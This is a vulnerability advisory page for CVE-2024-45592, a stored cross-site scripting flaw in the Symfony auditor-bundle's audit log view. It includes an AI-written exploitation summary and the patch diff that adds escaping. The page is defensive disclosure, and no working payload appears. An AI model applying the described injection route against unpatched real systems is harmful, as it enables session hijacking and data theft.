auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped
Description
auditor-bundle, formerly known as DoctrineAuditBundle, integrates auditor library into any Symfony 3.4+ application. Prior to version 5.2.6, there is an unescaped entity property enabling Javascript injection. This is possible because %source_label% in twig macro is not escaped. Therefore script tags can be inserted and are executed. The vulnerability is fixed in versions 6.0.0 and 5.2.6.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
auditor-bundle (DoctrineAuditBundle) for Symfony 3.4+ allowed JavaScript injection due to unescaped entity property in Twig macro.
Vulnerability
Description
CVE-2024-45592 is a Cross-Site Scripting (XSS) vulnerability in the auditor-bundle (formerly DoctrineAuditBundle), which integrates the auditor library into Symfony applications from version 3.4 onward. The root cause is that the %source_label% variable in a Twig macro is not escaped, allowing injection of unescaped HTML including script tags [1]. The missing escaping affects several variables ('%source%', '%source_label%', '%target_link%', '%target%', '%target_label%', and '%user%') which were passed to the translation function without applying any output escaping and then output via the |raw filter [3][4].
Exploitation
To exploit this flaw, an attacker must be able to control the value of an audited entity property that becomes source_label or another unescaped variable in the audit log summary view. For instance, if a user can modify a field (e.g., a 'name' field) that later appears as %source_label% in the audit trail, they can embed a `` tag or other HTML. No special authentication level is required beyond what is needed to create or modify audited entities; the injected script executes when an administrator or user views the audit log details page [1].
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session. This can lead to session hijacking, unauthorized actions, data theft, or defacement within the application. Since the vulnerability lies in the audit log UI, any user with access to view audit entries is potentially at risk. The CVSS v4 score has not yet been provided, but the issue is clearly a stored XSS scenario [1].
Mitigation
The vulnerability has been patched in versions 5.2.6 and 6.0.0 of the bundle. The fix applies the |escape filter to all inline variables passed to the translation function, ensuring that entity property values are properly escaped before being output as raw HTML [3][4]. Users still running version 5.x (which is now end-of-life) are strongly advised to upgrade to a supported version (6.x or 7.x) immediately [2]. No workarounds have been published, but disabling the audit view for untrusted users could reduce risk pending an upgrade.
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
damienharper/auditor-bundlePackagist | < 5.2.6 | 5.2.6 |
Affected products
3- Range: <5.2.6
- Range: < 5.2.6
Patches
2e7deb377fa89CVE-2024-45592 fix
1 file changed · +6 −6
src/Resources/views/Audit/helpers/helper.html.twig+6 −6 modified@@ -65,12 +65,12 @@ {{ ('audit.audit_details.summary.' ~ action)|trans({ '%source_link%': path('dh_auditor_show_entity_history', { 'entity': helper.namespaceToParam(entity), 'id': entry.getObjectId() }), - '%source%': source_subject, - '%source_label%': source_label, - '%target_link%': target_link, - '%target%': target_subject, - '%target_label%': target_label, - '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername(), + '%source%': source_subject|escape, + '%source_label%': source_label|escape, + '%target_link%': target_link|escape, + '%target%': target_subject|escape, + '%target_label%': target_label|escape, + '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername()|escape, '%ip%': entry.getIp() is not empty ? ', IP: ' ~ entry.getIp() : '', }, domain='auditor')|raw }} {% endmacro %}
42ba2940d8b9Merge commit from fork
1 file changed · +6 −6
src/Resources/views/Audit/helpers/helper.html.twig+6 −6 modified@@ -65,12 +65,12 @@ {{ ('audit.audit_details.summary.' ~ action)|trans({ '%source_link%': path('dh_auditor_show_entity_history', { 'entity': helper.namespaceToParam(entity), 'id': entry.getObjectId() }), - '%source%': source_subject, - '%source_label%': source_label, - '%target_link%': target_link, - '%target%': target_subject, - '%target_label%': target_label, - '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername(), + '%source%': source_subject|escape, + '%source_label%': source_label|escape, + '%target_link%': target_link|escape, + '%target%': target_subject|escape, + '%target_label%': target_label|escape, + '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername()|escape, '%ip%': entry.getIp() is not empty ? ', IP: ' ~ entry.getIp() : '', }, domain='auditor')|raw }} {% endmacro %}
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-78vg-7v27-hj67ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2024-45592ghsaADVISORY
- github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1ghsax_refsource_MISCWEB
- github.com/DamienHarper/auditor-bundle/commit/e7deb377fa89677d44973b486d26d6a7374233aeghsax_refsource_MISCWEB
- github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67ghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.